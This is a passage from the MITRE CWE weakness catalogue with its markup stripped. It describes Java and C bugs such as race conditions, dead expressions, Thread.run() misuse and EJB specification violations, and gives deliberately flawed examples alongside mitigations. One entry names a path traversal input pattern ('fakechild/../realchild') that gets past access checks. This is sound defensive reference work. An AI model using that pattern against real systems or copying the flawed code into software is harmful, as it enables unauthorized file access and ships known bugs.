DoS: Crash, Exit, or Restart + If the shared variable contains sensitive data, it may be manipulated or displayed in another user session. If this data is used to control the application, its value can be manipulated to cause the application to crash or perform poorly. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Remove the use of static variables used between servlets. If this cannot be avoided, use synchronized access for these variables. + + + + + The following code implements a basic counter for how many times the page has been accesed. + + public static class Counter extends HttpServlet {static int count = 0;protected void doGet(HttpServletRequest in, HttpServletResponse out)throws ServletException, IOException {out.setContentType("text/plain");PrintWriter p = out.getWriter();count++;p.println(count + " hits so far!");}} + + Consider when two separate threads, Thread A and Thread B, concurrently handle two different requests: + + + + Assume this is the first occurrence of doGet, so the value of count is 0. + + + doGet() is called within Thread A. + + + The execution of doGet() in Thread A continues to the point AFTER the value of the count variable is read, then incremented, but BEFORE it is saved back to count. At this stage, the incremented value is 1, but the value of count is 0. + + + doGet() is called within Thread B, and due to a higher thread priority, Thread B progresses to the point where the count variable is accessed (where it is still 0), incremented, and saved. After the save, count is 1. + + + Thread A continues. It saves the intermediate, incremented value to the count variable - but the incremented value is 1, so count is "re-saved" to 1. + + + + At this point, both Thread A and Thread B print that one hit has been seen, even though two separate requests have been processed. The value of count should be 2, not 1. + While this example does not have any real serious implications, if the shared variable in question is used for resource tracking, then resource consumption could occur. Other scenarios exist. + + + + + VNA00-J + Ensure visibility when accessing shared primitive variables + + + VNA02-J + Ensure that compound operations on shared variables are atomic + + + SFP19 + Missing Lock + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-12-09 + Critical + Made name and description more specific to match the essence of the rest of the entry. + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsynchronized Access to Shared Data + + + + The product contains a finalize() method that does not call super.finalize(). + The Java Language Specification states that it is a good practice for a finalize() method to call super.finalize(). + + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Call the super.finalize() method. + + + Testing + Use static analysis tools to spot such issues in your code. + + + + + The following method omits the call to super.finalize(). + + protected void finalize() {discardNative();} + + + + + + MET12-J + Do not use finalizers + + + SFP28 + Unexpected access points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Erroneous Finalize Method + + + + The product contains protection mechanisms to restrict access to 'realdir/filename', but it constructs pathnames using external input in the form of 'fakedir/../realdir/filename' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2001-1152 + Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters. + https://www.cve.org/CVERecord?id=CVE-2001-1152 + + + CVE-2000-0191 + application check access for restricted URL before canonicalization + https://www.cve.org/CVERecord?id=CVE-2000-0191 + + + CVE-2005-1366 + CGI source disclosure using "dirname/../cgi-bin" + https://www.cve.org/CVERecord?id=CVE-2005-1366 + + + + + dirname/fakechild/../realchild/filename + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is a manipulation that uses an injection for one consequence (containment violation using relative path) to achieve a different consequence (equivalence by alternate name). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Name, Observed_Examples, Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - dirname/fakechild/../realchild/filename + Path Equivalence: 'dirname/fakechild/../realchild/filename' + + + + The product contains an expression that will always evaluate to false. + + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Testing + Use Static Analysis tools to spot such conditions. + + + + + In the following Java example the updateUserAccountOrder() method used within an e-business product ordering/inventory application will validate the product number that was ordered and the user account number. If they are valid, the method will update the product inventory, the user account, and the user order appropriately. + + + public void updateUserAccountOrder(String productNumber, String accountNumber) { + boolean isValidProduct = false;boolean isValidAccount = false; + if (validProductNumber(productNumber)) {isValidProduct = true;updateInventory(productNumber);}else {return;} + if (validAccountNumber(accountNumber)) {isValidProduct = true;updateAccount(accountNumber, productNumber);} + if (isValidProduct && isValidAccount) {updateAccountOrder(accountNumber, productNumber);} + } + + However, the method never sets the isValidAccount variable after initializing it to false so the isValidProduct is mistakenly used twice. The result is that the expression "isValidProduct && isValidAccount" will always evaluate to false, so the updateAccountOrder() method will never be invoked. This will create serious problems with the product ordering application since the user account and inventory databases will be updated but the order will not be updated. + This can be easily corrected by updating the appropriate variable. + + ...if (validAccountNumber(accountNumber)) {isValidAccount = true;updateAccount(accountNumber, productNumber);}... + + + + In the following example, the hasReadWriteAccess method uses bit masks and bit operators to determine if a user has read and write privileges for a particular process. The variable mask is defined as a bit mask from the BIT_READ and BIT_WRITE constants that have been defined. The variable mask is used within the predicate of the hasReadWriteAccess method to determine if the userMask input parameter has the read and write bits set. + + #define BIT_READ 0x0001 // 00000001#define BIT_WRITE 0x0010 // 00010000 + unsigned int mask = BIT_READ & BIT_WRITE; /* intended to use "|" */ + // using "&", mask = 00000000// using "|", mask = 00010001 + // determine if user has read and write accessint hasReadWriteAccess(unsigned int userMask) { + // if the userMask has read and write bits set// then return 1 (true)if (userMask & mask) {return 1;} + // otherwise return 0 (false)return 0; + } + + However the bit operator used to initialize the mask variable is the AND operator rather than the intended OR operator (CWE-480), this resulted in the variable mask being set to 0. As a result, the if statement will always evaluate to false and never get executed. + The use of bit masks, bit operators and bitwise operations on variables can be difficult. If possible, try to use frameworks or libraries that provide appropriate functionality and abstract the implementation. + + + In the following example, the updateInventory method used within an e-business inventory application will update the inventory for a particular product. This method includes an if statement with an expression that will always evaluate to false. This is a common practice in C/C++ to introduce debugging statements quickly by simply changing the expression to evaluate to true and then removing those debugging statements by changing expression to evaluate to false. This is also a common practice for disabling features no longer needed. + + int updateInventory(char* productNumber, int numberOfItems) { + + int initCount = getProductCount(productNumber); + int updatedCount = initCount + numberOfItems; + int updated = updateProductCount(updatedCount); + // if statement for debugging purposes onlyif (1 == 0) { + + char productName[128];productName = getProductName(productNumber); + printf("product %s initially has %d items in inventory \n", productName, initCount);printf("adding %d items to inventory for %s \n", numberOfItems, productName); + if (updated == 0) {printf("Inventory updated for product %s to %d items \n", productName, updatedCount);} + else {printf("Inventory not updated for product: %s \n", productName);} + + } + return updated; + } + + + Using this practice for introducing debugging statements or disabling features creates dead code that can cause problems during code maintenance and potentially introduce vulnerabilities. To avoid using expressions that evaluate to false for debugging purposes a logging API or debugging API should be used for the output of debugging messages. + + + + + MSC00-C + Compile cleanly at high warning levels + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains an expression that will always evaluate to true. + + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Testing + Use Static Analysis tools to spot such conditions. + + + + + In the following Java example the updateInventory() method used within an e-business product ordering/inventory application will check if the input product number is in the store or in the warehouse. If the product is found, the method will update the store or warehouse database as well as the aggregate product database. If the product is not found, the method intends to do some special processing without updating any database. + + + public void updateInventory(String productNumber) { + boolean isProductAvailable = false;boolean isDelayed = false; + if (productInStore(productNumber)) {isProductAvailable = true;updateInStoreDatabase(productNumber);}else if (productInWarehouse(productNumber)) {isProductAvailable = true;updateInWarehouseDatabase(productNumber);}else {isProductAvailable = true;} + if ( isProductAvailable ) {updateProductDatabase(productNumber);}else if ( isDelayed ) { + + + /* Warn customer about delay before order processing */ + ... + } + } + + However, the method never sets the isDelayed variable and instead will always update the isProductAvailable variable to true. The result is that the predicate testing the isProductAvailable boolean will always evaluate to true and therefore always update the product database. Further, since the isDelayed variable is initialized to false and never changed, the expression always evaluates to false and the customer will never be warned of a delay on their product. + + + + + MSC00-C + Compile cleanly at high warning levels + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls a thread's run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee. + In most cases a direct call to a Thread object's run() method is a bug. The programmer intended to begin a new thread of control, but accidentally called run() instead of start(), so the run() method will execute in the caller's thread of control. + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Use the start() method instead of the run() method. + + + + + The following excerpt from a Java program mistakenly calls run() instead of start(). + + Thread thr = new Thread() {public void run() {...}}; + thr.run(); + + + + + System Process + + + + THI00-J + Do not invoke Thread.run() + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Call to Thread.run() + + + + The product does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform. + When leveraging external functionality, such as an API, it is important that the caller does so in accordance with the requirements of the external functionality or else unintended behaviors may result, possibly leaving the system vulnerable to any number of exploits. + + + + + + Primary + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + CVE-2006-7140 + Crypto implementation removes padding when it shouldn't, allowing forged signatures + https://www.cve.org/CVERecord?id=CVE-2006-7140 + + + CVE-2006-4339 + Crypto implementation removes padding when it shouldn't, allowing forged signatures + https://www.cve.org/CVERecord?id=CVE-2006-4339 + + + + + MET10-J + Follow the general contract when implementing the compareTo() method + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Follow Specification + + + + The product violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives. + The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the product violates the following EJB guideline: "An enterprise bean must not use thread synchronization primitives to synchronize execution of multiple instances." The specification justifies this requirement in the following way: "This rule is required to ensure consistent runtime semantics because while some EJB containers may use a single JVM to execute all enterprise bean's instances, others may distribute the instances across multiple JVMs." + + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Implementation + Do not use Synchronization Primitives when writing EJBs. + + + + + In the following Java example a Customer Entity EJB provides access to customer information in a database for a business application. + + @Entitypublic class Customer implements Serializable { + + private String id;private String firstName;private String lastName;private Address address; + public Customer() {...} + public Customer(String id, String firstName, String lastName) {...} + @Idpublic String getCustomerId() {...} + public synchronized void setCustomerId(String id) {...} + public String getFirstName() {...} + public synchronized void setFirstName(String firstName) {...} + public String getLastName() {...} + public synchronized void setLastName(String lastName) {...} + @OneToOne()public Address getAddress() {...} + public synchronized void setAddress(Address address) {...} + } + + However, the customer entity EJB uses the synchronized keyword for the set methods to attempt to provide thread safe synchronization for the member variables. The use of synchronized methods violate the restriction of the EJB specification against the use synchronization primitives within EJBs. Using synchronization primitives may cause inconsistent behavior of the EJB when used within different EJB containers. + + + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing. + The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the product violates the following EJB guideline: "An enterprise bean must not use the AWT functionality to attempt to output information to a display, or to input information from a keyboard." The specification justifies this requirement in the following way: "Most servers do not allow direct interaction between an application program and a keyboard/display attached to the server system." + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Architecture and Design + Do not use AWT/Swing when writing EJBs. + + + + + The following Java example is a simple converter class for converting US dollars to Yen. This converter class demonstrates the improper practice of using a stateless session Enterprise JavaBean that implements an AWT Component and AWT keyboard event listener to retrieve keyboard input from the user for the amount of the US dollars to convert to Yen. + + @Statelesspublic class ConverterSessionBean extends Component implements KeyListener, ConverterSessionRemote { + + + /* member variables for receiving keyboard input using AWT API */ + + ...private StringBuffer enteredText = new StringBuffer(); + + /* conversion rate on US dollars to Yen */ + + private BigDecimal yenRate = new BigDecimal("115.3100"); + public ConverterSessionBean() { + super(); + /* method calls for setting up AWT Component for receiving keyboard input */ + + ...addKeyListener(this); + } + public BigDecimal dollarToYen(BigDecimal dollars) {BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);} + + /* member functions for implementing AWT KeyListener interface */ + + public void keyTyped(KeyEvent event) {...} + public void keyPressed(KeyEvent e) {} + public void keyReleased(KeyEvent e) {} + + /* member functions for receiving keyboard input and displaying output */ + + public void paint(Graphics g) {...} + ... + } + + This use of the AWT and Swing APIs within any kind of Enterprise JavaBean not only violates the restriction of the EJB specification against using AWT or Swing within an EJB but also violates the intended use of Enterprise JavaBeans to separate business logic from presentation logic. + The Stateless Session Enterprise JavaBean should contain only business logic. Presentation logic should be provided by some other mechanism such as Servlets or Java Server Pages (JSP) as in the following Java/JSP example. + + @Statelesspublic class ConverterSessionBean implements ConverterSessionRemoteInterface { + + + /* conversion rate on US dollars to Yen */ + private BigDecimal yenRate = new BigDecimal("115.3100"); + public ConverterSessionBean() {} + + /* remote method to convert US dollars to Yen */ + + public BigDecimal dollarToYen(BigDecimal dollars) {BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);} + } + + + <%@ page import="converter.ejb.Converter, java.math.*, javax.naming.*"%><%! + private Converter converter = null;public void jspInit() {try {InitialContext ic = new InitialContext();converter = (Converter) ic.lookup(Converter.class.getName());} catch (Exception ex) {System.out.println("Couldn't create converter bean."+ ex.getMessage());}}public void jspDestroy() {converter = null;} + + %><html> + <head><title>Converter</title></head><body bgcolor="white"> + <h1>Converter</h1><hr><p>Enter an amount to convert:</p><form method="get"><input type="text" name="amount" size="25"><br><p><input type="submit" value="Submit"><input type="reset" value="Reset"></form><%String amount = request.getParameter("amount");if ( amount != null && amount.length() > 0 ) {BigDecimal d = new BigDecimal(amount);BigDecimal yenAmount = converter.dollarToYen(d); + + %><p><%= amount %> dollars are <%= yenAmount %> Yen.<p><%} + %> + </body> + </html> + + + + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product violates the Enterprise JavaBeans (EJB) specification by using the java.io package. + The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the product violates the following EJB guideline: "An enterprise bean must not use the java.io package to attempt to access files and directories in the file system." The specification justifies this requirement in the following way: "The file system APIs are not well-suited for business components to access data. Business components should use a resource manager API, such as JDBC, to store data." + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Implementation + Do not use Java I/O when writing EJBs. + + + + + The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. In this example, the interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Java I/O API to retrieve the XML document from the local file system. + + @Statelesspublic class InterestRateBean implements InterestRateRemote { + + private Document interestRateXMLDocument = null;private File interestRateFile = null; + public InterestRateBean() { + try { + + + /* get XML document from the local filesystem */ + interestRateFile = new File(Constants.INTEREST_RATE_FILE); + if (interestRateFile.exists()){DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);} + } catch (IOException ex) {...} + } + public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXML(points);} + + /* member function to retrieve interest rate from XML document on the local file system */ + + private BigDecimal getInterestRateFromXML(Integer points) {...} + } + + This use of the Java I/O API within any kind of Enterprise JavaBean violates the EJB specification by using the java.io package for accessing files within the local filesystem. + An Enterprise JavaBean should use a resource manager API for storing and accessing data. In the following example, the private member function getInterestRateFromXMLParser uses an XML parser API to retrieve the interest rates. + + @Statelesspublic class InterestRateBean implements InterestRateRemote { + + public InterestRateBean() {} + public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXMLParser(points);} + + /* member function to retrieve interest rate from XML document using an XML parser API */ + + private BigDecimal getInterestRateFromXMLParser(Integer points) {...} + } + + + + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is 